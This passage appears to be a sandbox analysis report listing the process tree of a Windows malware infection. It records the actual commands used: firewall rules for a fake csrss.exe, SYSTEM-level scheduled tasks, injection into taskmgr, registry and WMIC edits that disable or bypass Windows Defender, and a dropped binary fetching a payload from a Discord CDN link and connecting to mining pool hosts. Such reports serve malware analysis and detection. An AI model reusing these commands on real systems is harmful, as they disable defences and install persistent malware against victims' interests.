- - C:\Users\Admin\Pictures\wnoBQ6erADVdRUmpBaoc4kJO.exe
    "C:\Users\Admin\Pictures\wnoBQ6erADVdRUmpBaoc4kJO.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
  - - C:\Users\Admin\Pictures\wnoBQ6erADVdRUmpBaoc4kJO.exe
      "C:\Users\Admin\Pictures\wnoBQ6erADVdRUmpBaoc4kJO.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5208
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5900
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6548
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6616
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:7012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6800
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6792
- - C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe
    "C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2428
  - - C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe
      "C:\Users\Admin\Pictures\xqFR9DclKTs7bU8XGwKY57e3.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5220
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6044
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6520
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6532
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:6812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:6300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5124
- - C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe
    "C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2656
  - - C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe
      "C:\Users\Admin\Pictures\kubHbUH22R5cJMfEfeEVON21.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:5152
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6040
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6676
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:828
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3040
- - C:\Users\Admin\Pictures\FMRHImqKyRfmTuFwEnMaRCJU.exe
    "C:\Users\Admin\Pictures\FMRHImqKyRfmTuFwEnMaRCJU.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\u1c4.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u1c4.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\u1c4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u1c4.1.exe"
      4⤵
      Blocklisted process makes network request
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2476
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6892
- - C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe
    "C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4196
  - - C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe
      "C:\Users\Admin\Pictures\Z7gEesF5i729dkMqNVYOlP1M.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5132
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6288
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:6336
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:6728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6860
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:1512
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6412
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5736
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:3688
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6260
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:2376
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2476
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:5752
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:5436
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6740
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        Executes dropped EXE
        
        PID:6592
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:1484
- - C:\Users\Admin\Pictures\xEXmzcXoDuSVy5Lb18Lv0n45.exe
    "C:\Users\Admin\Pictures\xEXmzcXoDuSVy5Lb18Lv0n45.exe"
    3⤵
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:5316
- - C:\Users\Admin\Pictures\oiy1vPScVPH1BoLNrDBhvei7.exe
    "C:\Users\Admin\Pictures\oiy1vPScVPH1BoLNrDBhvei7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\7zSB110.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of WriteProcessMemory
      PID:1860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:816
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:1672
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:5244
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:5992
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:5124
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:6152
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:6168
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:3720
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2776
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:6208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6224
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:5980
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:7116
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5808
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB110.tmp\Install.exe\" it /wtcdidMFOV 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5676
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:6704
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:4756
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:6260
- - C:\Users\Admin\Pictures\pHXp9sFtbCFKytTVgnLIFPpH.exe
    "C:\Users\Admin\Pictures\pHXp9sFtbCFKytTVgnLIFPpH.exe"
    3⤵
    - Executes dropped EXE
    PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Enumerates system info in registry
      PID:6068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:2776
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:4644
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:6380
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:6432
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:2020
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:6716
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:6332
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:6764
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:6352
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6464
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:4624
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1148
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6900
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:7044
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\Install.exe\" it /timdidUuUu 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:6260
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:6832
      - C:\Windows\SysWOW64\cmd.exe
        
